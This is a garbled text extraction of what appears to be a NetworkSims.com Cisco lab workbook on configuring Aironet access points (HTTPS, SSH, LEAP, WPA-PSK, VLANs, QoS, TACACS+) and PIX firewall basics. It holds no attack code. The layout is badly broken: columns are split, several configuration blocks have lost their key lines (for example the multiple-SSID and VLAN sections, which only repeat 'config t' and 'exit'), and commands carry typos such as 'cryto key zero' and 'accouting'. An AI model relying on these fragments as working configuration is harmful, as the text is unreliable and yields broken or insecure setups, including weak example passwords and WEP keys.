HTTP server statistics:

Accepted connections total: 10
HTTP server history:
local-ipaddress:port
10.0.0.1:80
10.0.0.1:80
10.0.0.1:80
10.0.0.1:80
10.0.0.1:80
10.0.0.1:80
NetworkSims.com
remote-ipaddress:port
10.0.0.2:4046
10.0.0.2:4047
10.0.0.2:4049
10.0.0.2:4048
10.0.0.2:4051
10.0.0.2:4052
in-bytes
396
427
5352
4885
396
4878
out-bytes
192
192
52152
85094
192
86257
end-time
00:00:46
00:00:52
00:01:59
00:02:04
00:25:23
00:26:30
03/01
03/01
03/01
03/01
03/01
03/01
408
10.0.0.1:80
10.0.0.1:8080
10.0.0.1:8080
10.0.0.2:4053
10.0.0.2:4064
10.0.0.2:4065
5041
401
4343
50737
192
85878
00:26:35 03/01
00:47:16 03/01
00:48:21 03/01
# sh ip http server conn

ap# sh ip http server conn
all
HTTP server
connection
HTTP server
history
HTTP server
secure
HTTP secure
session-module HTTP server
statistics
HTTP server
status
HTTP server
out-bytes
all information
connection information
history information
server status information
application session module information
statistics information
status information
ap# sh ip http server status

HTTP secure server status: Disabled
Secure Web Server Explained

Outline: This challenge involves an analysis of a secure Web server.
Objectives: The objectives of this challenge are to explain the secure Web server.
Explanation
Unfortunately Web servers do not use encrypted data, thus they are a security risk, where
intruders could detect information in the data packets for the transmission of the Web page
from the device to a client. An improved method is to use a secure HTTP protocol such as
HTTPS. The configuration is thus:
# config t
(config)# int bvi1
NetworkSims.com
409
(config-if)#
(config)# ip
% Generating
(config)# ip
<0-65535>
(config)# ip
exit
http secure-server
1024 bit RSA keys ...[OK]
http secure-port ?
Secure port number(above 1024 or default 443)
http secure-port 443
By default the Web page is then accessed by the client with (https://10.0.0.1), afterwhich the
client responds with:
and then (the password is the default enable password):
and then:
The data transferred between the client and server will then be encrypted. To verify the
details:
ap#sh ip http server status
HTTP secure server status: Enabled
ap#sh ip http server conn
10.0.0.1:443
10.0.0.2:1082 266
10.0.0.1:443
10.0.0.2:1083 2493
out-bytes
52587
67032
ap#sho ip http server secure status

HTTP secure server status: Enabled
NetworkSims.com
410
User Priority Explained

Outline: This challenge involves an analysis of QoS..
Objectives: The objectives of this challenge are to explain QoS.
Explanation
The Aironet advertise their QoS parameters so that WLAN clients which require a certain
QoS requirement can these advertisements to associate with the required access-point. The
traffic-stream command is used to configure the radio interface for the CAC (Call
Admission Control used in Voice over Wireless) traffic stream properties. The Aironet
support traffic streams, such as:
ap# config t
ap(config)# int d0
ap(config-if)#traffic-stream ?
priority Apply to Priority
End with CNTL/Z.
ap(config-if)# traffic-stream pri ?

<0-7> UP Value
where the UP (user priority) is defined as:

0 (Best Effort)
1 (Background)
2 (Spare)
3 (Excellent)
4 (Controlled Load)
5 (Video)
6 (Voice)
7 (Network Control)
ap(config-if)# traffic-stream pri 0 ?
sta-rates Set rates to allow for traffic-stream
ap(config-if)# traffic-stream pri 0 sta ?
1.0
Allow 1 Mb/s rate
11.0
Allow 11 Mb/s rate
12.0
Allow 12 Mb/s rate
18.0
Allow 18 Mb/s rate
2.0
Allow 2 Mb/s rate
24.0
Allow 24 Mb/s rate
36.0
Allow 36 Mb/s rate
48.0
Allow 48 Mb/s rate
5.5
Allow 5.5 Mb/s rate
54.0
Allow 54 Mb/s rate
6.0
Allow 6 Mb/s rate
NetworkSims.com
411
9.0
Allow 9 Mb/s rate
nom-1.0
Allow Nominal 1 Mb/s rate
nom-11.0 Allow Nominal 11 Mb/s rate
nom-2.0
nom-5.5
Allow Nominal 5.5 Mb/s rate
nom-6.0
ap(config-if)#traffic-stream pri 0 sta 1.0
Thus the best effort for this access point is a rate of 1.0Mbps. If this was advertised to client,
they would choice if this was the best rate for the best effort.
SSH Explained
Outline: This challenge involves an analysis of SSH.
Objectives: The objectives of this challenge are to explain SSH.
Explanation
The TELNET protocol is insecure as the text is passed as plain text. An improved method is
to use SSH, which encrypts data. It requires that the domain-name and an RSA key pair:
ap# config t
ap(config)# ip domain-name test.com
ap(config)# crypto key generate rsa
How many bits in the modulus [512]:
% Generating 512 bit RSA keys ...[OK]
End with CNTL/Z.
To view the public key:

ap#show crypto key mypubkey rsa
% Key pair was generated at: 00:42:19
Key name: ap.test.com
Usage: General Purpose Key
Key is not exportable.
Key Data:
305C300D 06092A86 4886F70D 01010105
F1499B01 49C485A2 20C9FB37 8CD11053
32020F80 910AFBCC 6D402F90 96E8A59B
Key name: ap.test.com.server
Usage: Encryption Key
Key Data:
307C300D 06092A86 4886F70D 01010105
312319CA 0E919F76 72D2D5A9 36B4710C
D07C0000 832F6A1C 81411423 BE52CBF4
NetworkSims.com
UTC Mar 1 2002
00034B00 30480241 00DDD8C6 4B744520

039D344B 3C5BD55E E84E17C8 FD62DA08
40467A3E 8FEED18B B1020301 0001
UTC Mar 1 2002
00036B00 30680261 00B435A4 C007251B

CC4DE0C4 080D2B47 55970CA5 39F21170
ECBE417E 1C3C09D1 2BBC90DF 8DA398DB
412
AE8EFA46 282AEC54 F0909F82 466A19DD EBEFAEDE 7B4B992F 5F020301 0001
An SSH client such as putty can then be used to connect to the access point:
after which the client shows the message:
and the SSH connection is made, such as:

To get rid of keys:
ap(config)# cryto key zero
and to set the timeout and authentication retries:

ap(config)# ip ssh time-out 60
ap(config)# ip ssh authentication-retries 2
which sets the timeout to 60 seconds, and a maximum of two retries. Finally, to prevent
Telnet sessions:
ap(config)#line vty 0 4
ap(config-line)# transport input ssh
LEAP Explained
Outline: This challenge involves an analysis of LEAP.
Objectives: The objectives of this challenge are to explain LEAP.
Explanation
The following uses a local RADIUS server to authenticate using LEAP authentication:
(config)# hostname ap
(config)# int bvi1
(config-if)# exit
(config)# dot11 ssid APskills
NetworkSims.com
413
(config-ssid)# authentication network-eap eap_methods

(config-ssid)# guest-mode
(config-ssid)# exit
(config)# radius-server local
(config-radsrv)# nas 192.168.1.110 key sharedkey
(config-radsrv)# user aaauser password aaauser
(config-radsrv)# exit
(config)#radius-server host 192.168.1.110 auth 1812 acct
sharedkey
(config-if)interface d0
(config-if) channel 11
(config-if) station-role root
(config-if) encryption key 1 size 40bit aaaaaaaaaa transmit-key
(config-if) encryption mode ciphers tkip wep40
(config-if) ssid APskills
1813
key
In this case the user login for LEAP will be aaauser with a password of aaauser. Notice that
the NAS is set to the local IP address, and that the Radius server is set also as the local IP
address.
Notice also that the shared key (in this case named sharedkey) must be set the same for the
NAS and the Radius server.
Next setup the clients to support LEAP authentication, as shown in Figure 1. Once the client
has associated, determine the associated devices with:
# show dot assoc
802.11 Client Stations on Dot11Radio0:
SSID [APskills] :
MAC Address
IP address
0090.4b54.d83a 192.168.1.111
Others:
Device
4500-radio
Name
-
Parent
self
State
EAP-Assoc
(not related to any ssid)

Figure 1: LEAP setup
After which the WAP will display a message such as the following on a successful
association:
*Mar 1 00:00:51.750: %DOT11-6-ASSOC: Interface Dot11Radio0, Station 0090.4b54.d83a
Associated KEY_MGMT[WPA]
D0 Encapsulation
Outline: This challenge involves setting up the encapsulation on D0.
NetworkSims.com
414
Objectives: The objectives of this challenge are to outline encapsulation on D0.

Explanation
The following sets up SNAP encapsulation on D0:
(config)# int bvi1
(config-if)# exit
(config)# dot11 ssid APskills
(config-ssid)# authentication open
(config-ssid)# exit
(config-if)interface d0
(config-if) channel 11
(config-if) encapsulation snap
(config-if) ssid APskills
Command Filtering Explained

Explanation
An example is:
#
#
#
#
#
show
show
show
show
show
running
running
running
running
running
|
|
|
|
|
include udp
include tcp
include !
begin version
exclude int
Command Filtering Explained

NetworkSims.com
415
Explanation
An example is:
#
#
#
#
#
show
show
show
show
show
version
version
version
version
version
|
|
|
|
|
include cisco
include product
include ver
begin power
exclude pca
Public Secure Packet Forwarding (PSPF)

Explained
Outline: This challenge involves enabling PSPF.
Objectives: The objectives of this challenge are to outline the usage of PSPF.
Explanation
Public Secure Packet Forwarding (PSPF) is used to prevent clients from associating with an
access point and inadvertently communicating with other clients which are associated to the
access point. It thus allows the clients to connect to the Internet, without being part of the
local network. Often this facility is used in public wireless networks, such as on university
campuses.
An example is:
# config t
(config)# int d0
NetworkSims.com
416
(config-if)# bridge-port 1 ?
<cr>
circuit-group
input-address-list

group list
group list
input-lsap-list
input-type-list
lat-compression
interfaces
output-address-list
group list
a group list
output-lsap-list
output-type-list
port-protected
and other protected
address
input-pattern-list
output-pattern-list
path-cost
priority
source-learning
spanning-disabled
unicast-flooding
addresses
(config-if)# bridge-group 1 port-protected
Multiple Basic SSIDs (MBSSID) Explained

Outline: This challenge involves setting up MBSSID.
Objectives: The objectives of this challenge are to outline the usage of PSPF.
Explanation
Up to eight basic SSIDs (BSSIDs) can be assigned, and are similar to MAC addresses. This
allows MBSSIDs to assign a DTIM setting for each SSID, and then to broadcast multiple
SSIDs in a single beacon message. Using MBSSID makes the access-point more accessible to
guests.
An example is:
NetworkSims.com
417
# config t
(config-ssid)# mbssid guest-mode dtim 10
(config-ssid)# exit
(config)# int d0
(config-if)# mbssid
Note:
Large DTIM values are useful for increasing the battery life for power-save client devices.
Cisco Wireless Challenge 64 (Test)

Outline
configuration.
Cisco Wireless Challenge 65 (Test)

Outline
configuration.
SSID Redirection Explained

Outline: This challenge involves defining SSID redirection.
Objectives: The objectives of this challenge are to outline the usage of SSID redirection.
Explanation
With IP redirection on an SSID, all the packets from clients are sent to a specific IP address.
This is typically used in applications which use handhelds, where specific software is used
to handle the data packets. For example an SSID might be HANDHELDS, which handheld
scanners connect to. When redirection is used on this SSID, all the data packets will be set to
the specified IP address, where software can be setup to handle this. It is also possible to
redirect on specific types of traffic, but this requires ACLs.
NetworkSims.com
418
An example is:
# config t
(config-ssid)#ip ?
redirection Redirect client data to alternate IP address
(config-ssid)#ip redirection ?
host Destination host to forward data
(config-ssid)#ip redirection host ?
A.B.C.D IP redirect destination host address
(config-ssid)# ip redirection host 192.168.1.1
(config-ssid)# exit
SSID Redirection with ACL Explained

Outline: This challenge involves defining SSID redirection with ACLs.
Objectives: The objectives of this challenge are to outline the usage of SSID redirection with
ACLs.
Explanation
With IP redirection on an SSID, all the packets from clients are sent to a specific IP address.
This is typically used in applications which use handhelds, where specific software is used
to handle the data packets. For example an SSID might be HANDHELDS, which handheld
scanners connect to. When redirection is used on this SSID, all the data packets will be set to
the specified IP address, where software can be setup to handle this. It is also possible to
redirect on specific types of traffic, which requires the setup of an ACL which defines the
traffic which will be redirected. Note: All other traffic that isnt redirected will be
dropped!
An example is:
# config t
(config-ssid)#ip ?
redirection Redirect client data to alternate IP address
(config-ssid)#ip redirection ?
host Destination host to forward data
(config-ssid)#ip redirection host ?
A.B.C.D IP redirect destination host address
(config-ssid)#ip red host 1.2.3.4 ?
access-group Optional group access-list to apply
<cr>
(config-ssid)#ip red host 1.2.3.4 access-group ?
WORD Access-list number or name
NetworkSims.com
419
(config-ssid)#ip red
in Apply to input
<cr>
(config-ssid)# exit
host 1.2.3.4 access-group 1 ?

interface
host 1.2.3.4 access-group 1 in ?
host 1.2.3.4 access-group 1 in
SSID in an SSIDL IE Explained

Outline: This challenge involves using an SSID in an SSIDL IE (Information-element).
Objectives: The objectives of this challenge are to outline the usage of an SSID in an SSIDL
IE.
Explanation
There is only one broadcast SSID contained within a beacon from the access point. An
SSIDL information elements (SSIDL IEs) is contained within the beacon and can contain
additional SSIDs, thus clients can detect other SSIDs, along with the security settings for that
SSID.
An example is:
# config t
(config-ssid)# information-element ssidl ?
advertisement include SSID name in SSIDL IE
wps
advertise WPS capability in SSID IE
<cr>
(config-ssid)# information-element ssidl advertisement
(config-ssid)# exit
VLAN Encryption Explained

Outline: This challenge involves using an encryption key for a VLAN.
Objectives: The objectives of this challenge to use an encryption key for a VLAN.
Explanation
An encryption key can be set for each VLAN, so that the traffic is encrypted over the
interconnected ports of the VLAN. Up to four keys can be defined for the encryption key.
An example is:
NetworkSims.com
420
# config t
(config-ssid)# exit
(config)# int d0
(config-if)# encryption vlan 22 key 1 size 40 aaaaaaaaaa
which defines a 40-bit encryption key of aaaaaaaaaa (which is a hexadecimal value). The
other option is for a 128-bit key which has 32 hexadecimal digits. In this case the interface is
assigned to VLAN 22, so that all the other nodes in this VLAN will receive broadcasts from
a node in the VLAN.
VLAN Encryption Explained

Outline: This challenge involves using an encryption key for a VLAN.
Objectives: The objectives of this challenge to use an encryption mode for a VLAN.
Explanation
An encryption key can be set for each VLAN, so that the traffic is encrypted over the
interconnected ports of the VLAN. Most hosts now use WPA as it allows for TKIP
encryption. WEP suffers from many security problems, but TKIP overcomes most of these,
and is still compatible with most currently available IEEE 802.11 wireless interfaces. The
CKIP and CMIC are Cisco-derived methods, and sometimes lack compatibility. An example
for WPA using TKIP is:
# config t
(config-ssid)# exit
(config)# int d0
(config-if)# encryption vlan 22 mode cipers tkip
The two main cipher suites for authenticated key management:

CCKM (Cisco Centralized Key Management). This uses either:
wep128
wep40
ckip
cmic
ckip-cmic
tkip
NetworkSims.com
421
WPA. This uses either:
tkip
tkip wep128
tkip wep40
VLAN Broadcast-key Explained

Outline: This challenge involves defining the change time for the broadcast key.
Objectives: The objectives of this challenge to change the time for the broadcast key.
Explanation
The broadcast key rotation allows for a new key to be broadcast to the network. It is
disabled by default. It is used with 802.1x authentication, such as with LEAP, EAP-TLS, or
PEAP). The broadcast-key is change time is defined with:
# config t
(config-ssid)# exit
(config)# int d0
(config-if)# broadcast-key vlan 22 change 100
which enables the broadcast-key on VLAN 22, and defines that the broadcast key is changed
every 100 seconds.
Authentication
Explained
based
on
MAC-address
Outline: This challenge involves defining authentication based on MAC addresses.

Explanation
# config t
(config-ssid)# authentication open mac-address maclist
(config-ssid)# exit
(config)# aaa authentication login maclist group radius
NetworkSims.com
422
WPA-PSK Explained
Outline: This challenge involves defining the pres shared key for WPA-PSK.
Explanation
Unfortunately, WEP suffers from many problems, and should not be used for sensitive data.
An improvement which keeps compatibility with WEP is TKIP. One method is WPA-PSK
(Pre-shared key), where the users defines a pre-share key, which is setup on both the access
point and the client. An example setup of the WPA-PSK on a Linksys access point (Figure 1)
is shown, and on a client (Figure 2) with the same shared key of napieruniversity.
> enable
# config t
(config)# dot11 ssid texas
(config-ssid)# wpa-psk ascii napieruniversity
(config-ssid)# exit
(config)# int d0
(config-if)# ssid texas
diagram not included in this version

Figure 1: WPA-PSK (Linksys configuration)
diagram not included in this version
Figure 2: WPA-PSK (client)
Authentication Holdtimes Explained

Outline: This challenge involves defining the timeouts for authentication.
Explanation
An example is
> enable
# config t
(config)# dot11 holdoff-time 15
(config)# dot1x timeout supp-response 10
(config)# int d0
(config-if)# dot1x reauth-period 10
(config-if)# countermeasure tkip hold-time
where:
NetworkSims.com
423
(config)# dot11 holdoff-time x
This is the time that a client device must wait before it can reattempt to authenticate, after it
has failed an authentication. This occurs when the client device fails three logins or does not
reply to three authentication requests. 1-65,545 seconds.
(config)# dot1x timeout supp-response 10
This is the time that the access point waits for a reply to an EAP/dot1x message from a client
before the authentication is failed.
(config-if)# dot1x reauth-period 10
This is the time that the access point waits before it asks the client to reauthenticate itself.
(config-if)# countermeasure tkip hold-time
This defines the TKIP MIC failure holdtime, and is caused when the access point detects two
MIC failures in a period of 60 seconds. It will then, for the holdtime period, blocks all TKIP
clients on the interface.
WLCCP Explained
Outline: This challenge involves defining WLCCP (Wireless LAN Context Communication
Protocol).
Explanation
In large campus area networks, it is important that mobile nodes are able to migrate from
one access point to another. If possible they must hand the current context from one access
point to the other.
WLCCP establishes and manages wireless network topologies in a SWAN (Smart Wireless
Architecture for Networking). It securely manages an operational context for mobile clients,
typically in a campus-type network. In the registration phase, it can automatically create
and delete network link, and securely distribute operational context, typically with Layer 2
forwarding paths.
With WLCCP, a sole infrastructure node is defined as the central control point within each
subnet, and allows access points and mobile nodes to select a parent node for a least-cost path
to the backbone connection. An example is
> enable
# config t
(config)# aaa authentication login testi group radius
(config)# aaa authentication login testc group radius
NetworkSims.com
424
(config)# wlccp wds priority 200 interface bvi1

(config)# wlccp authentication-server infrastructure testi
(config)# wlccp authentication-server client any testc
(config-wlccp-auth)# ssid testing
which defines that the authentication of infrastructure devices is done using the server
group testi, and that client devices using the testing SSID are authenticated using the server
group of testc.
Cisco Wireless Test

Outline
This challenge involves taking a Wireless test.

Outline
This challenge involves the configuration of TACACS+ accounting and authe tication for the
Aironet.
Objectives
Define a host name.

Define AAA.
Define Tacacs+ account for network and exec.

> en
# config t
(config)# aaa accounting exec default start-stop group tacacs+
(config)# aaa accouting network default start-stop group tacacs+
NetworkSims.com
425
Example
> en
# config t
(config)# tacacs-server ?
administration
Start tacacs+ deamon handling administrative messages
cache
AAA auth cache default server group
directed-request Allow user to specify tacacs server to use with `@server'
dns-alias-lookup Enable IP Domain Name System Alias lookup for TACACS
servers
host
Specify a TACACS server
key
Set TACACS+ encryption key.
packet
Modify TACACS+ packet options
timeout
Time to wait for a TACACS server to reply
(config)# tacacs-server host ?
Hostname or A.B.C.D IP address of TACACS server
<cr>
ap(config)# tacacs-server key ?
0
7
Specifies HIDDEN key will follow
LINE The UNENCRYPTED (cleartext) shared key
(config)# tacacs-server key crinkle
arap
attempts
Set the maximum number of authentication attempts
banner
dot1x
Set authentication lists for IEEE 802.1x.
enable
eou
Set authentication lists for EAPoUDP
fail-message
login
ppp
sgbp
Set authentication lists for sgbp.
WORD
(config)# aaa
cache
enable
group
line
local
local-case
none
authentication login default ?

Use Cached-group
Use Server-group
NO authentication.
(config)# aaa authentication login default group ?

WORD
Server-group name
radius
NetworkSims.com
426

auth-proxy
For Authentication Proxy Services
cache
For AAA cache configuration
commands
configuration
For downloading configurations from AAA server
console
For enabling console authorization
exec
network
reverse-access
template
Enable template authorization
WORD
(config)# aaa author n d ?
cache
Use Cached-group
group
Use server-group.
if-authenticated Succeed if user has authenticated.
local
Use local database.
none
No authorization (always succeeds).
(config)# aaa author n d g ?
WORD
Server-group name
radius
(config)# aaa accounting ?
auth-proxy
For authentication proxy events.
commands
connection
For outbound connections. (telnet, rlogin)
delay-start
Delay PPP Network start record until peer IP address is
known.
exec
gigawords
64 bit interface counters to support Radius attributes 52 &
53.
nested
When starting PPP from EXEC, generate NETWORK records
before EXEC-STOP record.
network
resource
For resource events.
send
Send records to accounting server.
session-duration Set the preference for calculating session durations
suppress
Do not generate accounting records for a specific type of
user.
system
For system events.
update
Enable accounting update records.
(config)# aaa accounting exec ?
WORD
NetworkSims.com
427
(config)# aaa
none
start-stop
stop-only
accounting exec default ?

No accounting.
(config)# aaa accounting exec default start-stop ?

broadcast Use Broadcast for Accounting
group
Use Server-group
(config)# aaa accounting exec default sta group ?
WORD
Server-group name
radius
(config)# aaa accounting exec default start-stop group tacacs+
(config)# aaa accounting net ?
WORD
(config)# aaa
none
start-stop
stop-only
accouting network default ?

No accounting.
(config)# aaa accouting network default start-stop ?

broadcast Use Broadcast for Accounting
group
Use Server-group
(config)# aaa accouting exec default group ?
WORD
Server-group name
radius
(config)# aaa accouting network default start-stop group tacacs+

Outline
This challenge involves the configuration of multiple SSIDs.
Objectives
Create multiple SSIDs.

> en
NetworkSims.com
428
# config t
(config)# dot11 ssid network1
(config-ssid)# mbssid guest-mode
(config-ssid)# exit
# config t
(config-ssid)# exit
# config t
(config-ssid)# exit
(config)# int d0
(config-if)# mbssid
(config-if)# ssid network1
Example
> en
# config t
(config-ssid)# exit
# config t
(config-ssid)# exit
# config t
(config-ssid)# exit
(config)# int d0
(config-if)# mbssid

Outline
This challenge involves the configuration of multiple SSIDs which are associated with
VLANs.
Objectives
Define sub-interfaces.
NetworkSims.com
429
Create VLANs.
Define multiple SSIDs.

> en
# config t
(config-ssid)# exit
# config t
(config-ssid)# exit
# config t
(config-ssid)# exit
(config)# int d0
(config-if)# mbssid
(config)# int d0.1
(config-if)# encapsulation
(config-if)# exit
(config)# int e0.1
(config-if)# exit
(config)# int d0.2
(config-if)# exit
(config)# int e0.2
(config-if)# exit
(config)# int d0.3
(config-if)# exit
(config)# int e0.1
(config-if)# exit
dot1q 1 native
dot1q 1 native
dot1q 2
dot1q 2
dot1q 3
dot1q 3
Example
> en
# config t
(config-ssid)# exit
# config t
NetworkSims.com
430
(config-ssid)# exit
# config t
(config-ssid)# exit
(config)# int d0.1
(config-if)# exit
(config)# int e0.1
(config-if)# exit
(config)# int d0.2
(config-if)# exit
(config)# int e0.2
(config-if)# exit
(config)# int d0.3
(config-if)# exit
(config)# int e0.1
(config-if)# end
dot1q 1 native
dot1q 1 native
dot1q 2
dot1q 2
dot1q 3
dot1q 3
# show vlan
Virtual LAN ID:
1 (IEEE 802.1Q Encapsulation)
vLAN Trunk Interfaces:

Virtual-Dot11Radio0.1
Dot11Radio0.1
This is configured as native Vlan for the following interface(s) :

Dot11Radio0
Virtual-Dot11Radio0
Protocols Configured:
Address:
Bridging
Bridge Group 1
Bridging
Bridge Group 1
Virtual LAN ID:
Transmitted:
9
9
Received:
1
1
Transmitted:
0
0
Received:
1
1
Transmitted:
0
0

Dot11Radio0.2
Address:
Bridging
Bridge Group 2
Bridging
Bridge Group 2
Virtual LAN ID:
Received:
17
17

Dot11Radio0.3
Address:
Bridging
Bridge Group 2
Bridging
Bridge Group 2
NetworkSims.com
431
This assigns three VLANs. The first is allowed to the network1 SSID, the second to network2
and the third to network3.
Theory
In the following example VLAN 1 is associated to Scotland on the first Aironet, Ireland on
the next, and France on the third one. Each of the nodes which connect to VLAN 1 will all be
part of the same network, even though they connect to different Aironets. The same applies
to VLAN 2, where nodes connecting to England, Wales and Germany, will be in the same
network. The key factor is that the switch supports 802.1q which will trunk between the
ports on the switch.
An example of trunking on the switch is:
# config t
(config-vlan)# exit
(config-vlan)# exit
(config)# int fa0/1
(config-if)# switchport trunk allowed add vlan 1,2
(config-if)# switchport nonegotiate
Diagram has been left-out in this version see e-Book.
When the bridge group is added to the radio port the following are added:
bridge-group 2 subscriber-loop-control
bridge-group 2 block-unknown-source
NetworkSims.com
432
no bridge-group 2 unicast-flooding
bridge-group 2 spanning-disabled"

Outline
This challenge involves defining precedence of QoS Settings. If QoS is enabled, the device
then queues packets based on the Layer 2 class of service value for each packet. This can
either be:
Packets already classified. This is typical from a QoS-enabled device, such as a

switch or router. These contain values in the 802.1P field, and take priority over all
other polices.
QoS from Wireless Phones. This allows wireless phone traffic to get a higher
priority than other traffic. In addition, a QoS Basic Service Set (QBSS) can be enabled
to advertise channel load information in the beacon and probe response frames. This
can then be used by the phones to determine the best access point to associate to,
such as for their traffic load.
This example shows how to enable IEEE 802.11 phone support with the legacy QBSS Load
element:
AP(config)# dot11 phone
Objectives
Enable IEEE 802.11 phone support for the legacy QBSS load element.

> en
# config t
(config)# dot11 phone
(config)# int d0
(config-if)# traffic-class best-effort cw-min 4 cw-max 10 fixed-slot 2
Example
> en
# config t
(config)# dot11 phone
(config)# int d0
NetworkSims.com
433
(config-if)# traffic-control ?
0
Parameters for priority 0
1
2
3
4
5
6
7
background
Parameters for the background access class
best-effort Parameters for the best effort access class
video
Parameters for the video access class
voice
Parameters for voice access class
(config-if)# traffic-c best-effort ?
cw-max
802.11 contention window maximum
cw-min
802.11 contention window minimum
fixed-slot 802.11 fixed backoff slot time
<cr>
(config-if)# traffic-c be cw-min ?
<0-10> CwMin will be ( 2 to the power of the entered value ) - 1
(config-if)# traffic-c best cw-min 4 ?
cw-max
802.11 contention window maximum
<cr>
(config-if)# traffic-c best cw-min 4 cw-max ?
<0-10> CwMax will be ( 2 to the power of the entered value ) - 1
(config-if)# traffic-c best cw-min 4 cw-max 10 ?
<cr>
(config-if)# traffic-c best cw-min 4 cw-max 10 fixed-slot ?
<0-16> 802.11 fixed backoff slot time
(config-if)# traffic-class best-effort cw-min 4 cw-max 10 fixed-slot 2
This configuration enables 802.11-compliant phone support and configures the best effort
traffic class for contention windows and fixed-slot backoff values. In this case the backoff for
best effort is started, where it waits a minimum of the 802.11 Short Inter-Frame Space time
plus two backoff slots.
NetworkSims.com
434
PIX/SPNA
Cisco PIX Challenge 1

Outline
This challenge involves the configuration of basic PIX details.
Objectives
Setup the hostname.

Setup IP address of E0.
Enable E0.
Example (Version 6.x)

# sh ip add
System IP Addresses:
IP address outside 0.0.0.0
IP address inside 0.0.0.0
IP address inf2 0.0.0.0
Current IP Addresses:
# sh nameif
# config t
(config)# help hos
USAGE:
hostname <name>
show hostname [fqdn]
DESCRIPTION:
hostname
Change host name
(config)# hostname freds

(config)# domain-name fred.com
(config)# help domainUSAGE:
[no] domain-name <name>
clear configure domain-name
NetworkSims.com
435
DESCRIPTION:
domain-name
Change domain name
(config)# ip address outside 192.168.1.1 255.255.255.0
(config)# interface e0 auto
(config)# exit
# show ip add
# show running
# sh int e0
Interface Ethernet0 outside, is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.1.1, subnet mask 255.255.255.0
Received 0 broadcasts, 0 runts, 0 giants
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets

# sh nameif
# config t
(config)# help hostname
USAGE:
hostname <name>
DESCRIPTION:
hostname
Change host name

DESCRIPTION:
domain-name
Change domain name
(config)# hostname ?
configure mode commands/options:
WORD < 64 char Host name for this system. A hostname must start and end with
a letter or digit and have as interior characters only
letters, digits, or a hyphen.
(config)# domain-name?
NetworkSims.com
436

WORD Domain names must begin and end with a digit/letter, only letters,
digits, and hyphen are allowed as internal characters, labels are
separated by a dot. A maximum of 63 characters is allowed.
(config)# int e0
(config-if)# help ip
USAGE:
[no] ip address <ip_address> [<mask>] [standby <sby_ip_addr>]
[no] ip address dhcp [setroute] [retry <4-16>]
show ip address [<interface> | <if_name>]
clear ip
DESCRIPTION:
ip
Set the ip address and mask for an interface
SYNTAX:
<ip_address>
<mask>
<sby_ip_addr>
<4-16>
<interface>:
<if_name>:
Device's network interface address

Netmask of ip_address
Device failover peer's network interface address
Number of retries performed by dhcp client, default is 4
Interface hardware name as used by 'interface' command.
Composed of <type> <port>[/<subif_number>] or
<type> <slot>/<port>[/<subif_number>]
Interface name assigned by 'nameif' command
see also:
nameif, security-level
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# help shut
USAGE:
[no] shutdown
DESCRIPTION:
shutdown
(config-if)# exit
(config)# exit
# show ip add
# sh ip add
# show running
myPIX # sh int e0
NetworkSims.com
437

myPIX # sh int e1
Interface Ethernet1 inside, is down, line protocol is down

Outline
Objectives
Define the IP address and subnet mask of E1.

Example (Ver 6.x)

> enable
# nameif
# config t
(config)# ip address inf2 192.168.1.1 255.255.255.0
(config)# ip address inside 10.0.1.1 255.255.0.0
(config)# exit
# show ip
NetworkSims.com
438
# show running
# sh int e1
Interface Ethernet1 inside, is up, line protocol is up
Example (Ver 7.x)

> enable
# sh nameif
# config t
(config)# int e1
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# exit
# show ip add
# show running
# sh int e1

Outline
NetworkSims.com
439

Objectives
Define the name of each of the interfaces.
Example (Ver 6.x)

> enable
# nameif
# config t
(config)# nameif e0 mars security0
(config)# nameif e1 pluto security100
(config)# nameif e2 jupiter security50
(config)# help username
USAGE:
username <username> {nopassword|password <password>
[encrypted]} [privilege <level>]
no username <name>
[no] username <name> attributes
clear configure username [<name>]
show running-config [all] username [<name> [attributes]]
DESCRIPTION:
username
Configure user authentication local database
SYNTAX:
<username>
The name of the user. A minimum of 4 characters is required.

A maximum of 64 characters is allowed.
<nopassword>
Indicates that this user has no password
<password>
The password for this user
encrypted
Indicate the <password> entered is encrypted
<level>
The privilege level for this user
attributes
Enter the attributes sub-command mode
(config)# exit
# show running
Example (Ver 7.x)

> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif mars
(config-if)# security-level 0
(config-if)# exit
(config)# int e1
(config-if)# nameif pluto
NetworkSims.com
440
(config-if)# exit
(config)# int e2
(config-if)# help nameif
USAGE:
nameif <if_name>
no nameif [<if_name>]
show running-config [all] nameif [<interface>]
show nameif [<interface>]
clear nameif
DESCRIPTION:
nameif
Assign name to interface
SYNTAX:
<if_name>
<interface>:
A name by which this interface will be referred in all

other commands
Interface identifier as used in the 'interface' command.
see also:
security-level, interface, static, global, nat
(config-if)# nameif jupiter
(config-if)# help security-level
USAGE:
security-level <0-100>
no security-level [<0-100>]
DESCRIPTION:
security-level
Specify security level of interface
SYNTAX:
<0-100>
The security level of this interface from 0 to 100.

The relative security level between two interfaces determines
the way the Adaptive Security Algorithm is applied.
A lower security_level interface is outside relative to a higher
level interface and equivalent interfaces are outside to each
other.
see also:
nameif
(config-if)# exit
USAGE:
no username <name>
DESCRIPTION:
username
NetworkSims.com
441
SYNTAX:
<username>

<nopassword>
<password>
encrypted
<level>
attributes
(config)# exit
# show running
# show running user

Outline
Objectives
Defines a hostname and passwords

Enables the HTTP server.
Defines a MOTD banner.
Example (Ver 6.x)

> enable
# nameif
# config t
(config)# help enable
USAGE:
enable password [<pw>] [level <level>] [encrypted]
no enable password level <level>
show running-config enable
DESCRIPTION:
enable
Configure enable passwords
SYNTAX:
<pw>
The password for this privilege level
<level>
The privilege level
<encrypted>
Indicates that this password is encrypted
(config)# enable ?
NetworkSims.com
442

password Configure password for the enable command
(config)# enable password ?
WORD Enter a password for the privilege level
<cr>
(config)# enable password kirk
(config)# password ?
configure
WORD A
(config)#
(config)#
mode commands/options:
password of up to 16 alphanumeric characters
passwd kent
help password
USAGE:
[no] password|passwd <password> encrypted
clear configure passwd
DESCRIPTION:
passwd
Change Telnet console access password
SYNTAX:
<password>
A password of up to 16 alphanumeric characters

Factory-default password is cisco
encrypted
see also:
